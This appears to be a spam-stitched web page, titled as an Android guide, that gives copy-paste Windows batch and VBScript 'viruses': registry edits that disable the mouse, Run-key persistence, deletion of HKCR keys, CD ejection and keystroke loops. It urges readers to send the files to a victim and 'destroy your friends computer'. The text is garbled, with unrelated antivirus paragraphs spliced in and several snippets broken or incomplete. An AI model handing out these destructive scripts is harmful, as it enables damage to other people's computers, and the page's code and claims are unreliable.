How To Make A Virus Using Android

VIRUS is a collection of codes to destroy your system in seconds. A computer virus is a malware program that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be 'infected'. All these viruses are man-made. According to a survey around 20% of the total Internet viruses is released by organized crime units. It can contain any of the following:


Make Computer Virus
Today in this guide we are going to show how you can

Those are added benefits, but also they’re also features Android now has built in. To put it plainly, you can use an antivirus app if it makes you feel better, but all you’re really doing is allowing some third-party app to use up resources doing what your phone already does on its own. It doesn’t make a lot of sense. How to create virus using notepad Just Copy/paste all the code in notepad. Save the file with extension.bat (like seofreetips.bat) Send it to the victim by mail or by Pen Drive. So let’s start to create a trojan virus using notepad to run via command prompt(cmd) in Windows 10, 8/8.1, 7 or XP. Now, Open the Notepad application and Copy (Ctrl+C) and Paste (Ctrl+V) the codes given below one by one for the different virus in a different file.

make dangerous virus by just copy and paste. You don't need to download any software to make them. Inbuilt notepad in your Windows is enough.

How Virus Are Made?

Computer virus is nothing a bunch of code. You can write them in notepad and then just save and execute. Viruses are created using Batch programming. Always remember don't ever try to run them on your personal system otherwise it would destroy your computer completely. Protection from virus is also a part of virus creation.
We've listed different types of viruses to destroy hard disk, block, CD drives, disable USB ports and much more.

How To Make A Virus In Android


How to make android virus
Must Read: - Notepad Tips & Tricks

1. Make A Virus To Delete Hard Drive
  • Open your notepad.
  • Copy the code given below and paste it in your notepad
@Echo off
  • Save the file as virus.bat.
  • That's it, just run the file and see the magic. It will delete all the content of C Drive.
2. Make A Virus To Disable Mouse
  • Open your notepad.
  • Copy and paste the code in notepad.

set key='HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass'
reg add %key% /v Start /t REG_DWORD /d 4
  • Save the file as disablemouse.bat and execute it.
Copy below code and save it as DisInt.bat.
echo break off>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
PAUSE
4. Virus To Crash Your Computer System
Copy and paste the code and save the file as crash.bat.

Set WSHShell=Wscript.CreateObject('Wscript.Shell')
Dim x
WSHShell.Run 'Tourstart.exe'


:top

How To Create A Virus For Android Using Termux

GOTO top
Save the file as anything.bat.
6. Virus For Popping CD Drive
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
colCDROMs.Item(i).Eject
For i = 0 to colCDROMs.Count – 1
Next
wscript.sleep 100



START reg delete HKCR/.exe
START reg delete HKCR/*
ECHO Your computer has been destroyed.








How To Create A Virus Using Android Phone







Android


Android Phone Virus Removal



Set wshShell =wscript.CreateObject(“WScript.Shell”)

How To Create A Virus Using Android

do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
loop
Now save it as dancecap.bat.

Android Phone Virus

10. Virus For Endless Enter
Set wshShell = wscript.CreateObject(”WScript.Shell”)
wscript.sleep 100
loop
Save the code as endenter.bat.
So that's it. Go and destroy your friends computer. But always beware don't use them on your personal system.